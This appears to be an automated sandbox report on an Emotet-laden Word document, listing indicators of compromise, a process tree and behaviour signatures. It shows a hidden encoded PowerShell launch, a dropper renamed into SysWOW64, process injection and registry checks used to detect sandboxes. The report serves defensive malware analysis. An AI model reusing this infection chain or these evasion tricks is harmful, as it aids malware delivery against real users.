Analysis
max time kernel: 128s
resource: win10v191014
submitted: 16-12-2019 11:53
Task: task1
Sample: Docs_7f6f469f6981d4a92806d0d3b706e258.1.doc
Resource: win7v191014
General
Malware Config
Extracted
Extracted: emotet
Signatures
Executes dropped EXE (4 IoCs)
  pid   Process
  4268  218.exe
  3748  218.exe
  4880  sensorhal.exe
  4892  sensorhal.exe
Suspicious behavior: EnumeratesProcesses (2 IoCs)
  pid   Process
  4672  Powershell.exe
  4892  sensorhal.exe
Drops file in System32 directory (6 IoCs)
  description | ioc | Process
  File renamed | C:\Users\Admin\218.exe => C:\Windows\SysWOW64\sensorhal.exe | 218.exe
  File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat | sensorhal.exe
  File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 | sensorhal.exe
  File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE | sensorhal.exe
  File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies | sensorhal.exe
  File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 | sensorhal.exe
Drops file in Windows directory (1 IoC)
  description | ioc | Process
  File opened for modification | C:\Windows\Debug\ESE.TXT | svchost.exe
Suspicious use of AdjustPrivilegeToken (1 IoC)
  description | pid | Process
  Token: SeDebugPrivilege | 4672 | Powershell.exe
Suspicious behavior: EmotetMutantsSpam (2 IoCs)
  pid   Process
  3748  218.exe
  4892  sensorhal.exe
Checks processor information in registry (2 TTPs, 2 IoCs)
  Processor information is often read in order to detect sandboxing environments.
  description | ioc
  Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz
description | ioc
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Security Center\cval = "0"
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Security Center\cval = "1"
Checks system information in the registry (2 TTPs, 2 IoCs)
  System information is often read in order to detect sandboxing environments.
  description | ioc
  Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer
  Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemProductName
Suspicious behavior: AddClipboardFormatListener (1 IoC)
  pid   Process
  4944  WINWORD.EXE
Suspicious use of SetWindowsHookEx (5 IoCs)
  pid   Process
  4944  WINWORD.EXE
  4268  218.exe
  3748  218.exe
  4880  sensorhal.exe
  4892  sensorhal.exe
Suspicious use of WriteProcessMemory (4 IoCs)
  description | pid | Process | procid_target
  PID 4536 wrote to memory of 3756 | 4536 | SppExtComObj.exe | 75
  PID 4672 wrote to memory of 4268 | 4672 | Powershell.exe | 79
  PID 4268 wrote to memory of 3748 | 4268 | 218.exe | 80
  PID 4880 wrote to memory of 4892 | 4880 | sensorhal.exe | 84
Suspicious use of FindShellTrayWindow (1 IoC)
  pid   Process
  4944  WINWORD.EXE
Enumerates system info in registry (2 TTPs, 3 IoCs)
  description | ioc
  Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU
Processes
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
  Command line: "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\Docs_7f6f469f6981d4a92806d0d3b706e258.1.doc" /o ""
  PID: 4944
  - Suspicious behavior: AddClipboardFormatListener
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of FindShellTrayWindow
C:\Windows\system32\SppExtComObj.exe
  Command line: C:\Windows\system32\SppExtComObj.exe -Embedding
  PID: 4536
  - Suspicious use of WriteProcessMemory
    C:\Windows\System32\SLUI.exe
      Command line: "C:\Windows\System32\SLUI.exe" RuleId=eeba1977-569e-4571-b639-7623d8bfecc0;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=2de67392-b7a7-462a-b1ca-108dd189f588;NotificationInterval=1440;Trigger=TimerEvent
      PID: 3756
C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe
  Command line: Powershell -w hidden -en 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
  PID: 4672
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
    C:\Users\Admin\218.exe
      Command line: "C:\Users\Admin\218.exe"
      PID: 4268
      - Executes dropped EXE
      - Suspicious use of SetWindowsHookEx
      - Suspicious use of WriteProcessMemory
        C:\Users\Admin\218.exe
          Command line: --fa4b85d7
          PID: 3748
          - Executes dropped EXE
          - Drops file in System32 directory
          - Suspicious behavior: EmotetMutantsSpam
          - Suspicious use of SetWindowsHookEx
\??\c:\windows\system32\svchost.exe
  Command line: c:\windows\system32\svchost.exe -k netsvcs -s BITS
  PID: 4188
  - Drops file in Windows directory
\??\c:\windows\system32\svchost.exe
  Command line: c:\windows\system32\svchost.exe -k localserviceandnoimpersonation -s SSDPSRV
  PID: 4036
C:\Windows\SysWOW64\sensorhal.exe
  Command line: "C:\Windows\SysWOW64\sensorhal.exe"
  PID: 4880
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
    C:\Windows\SysWOW64\sensorhal.exe
      Command line: --aec77d6f
      PID: 4892
      - Executes dropped EXE
      - Suspicious behavior: EnumeratesProcesses
      - Drops file in System32 directory
      - Suspicious behavior: EmotetMutantsSpam
      - Suspicious use of SetWindowsHookEx
\??\c:\windows\system32\svchost.exe
  Command line: c:\windows\system32\svchost.exe -k netsvcs -s DoSvc
  PID: 4760
\??\c:\windows\system32\svchost.exe
  Command line: c:\windows\system32\svchost.exe -k unistacksvcgroup
  PID: 524
\??\c:\windows\system32\svchost.exe
  Command line: c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s wscsvc
  PID: 576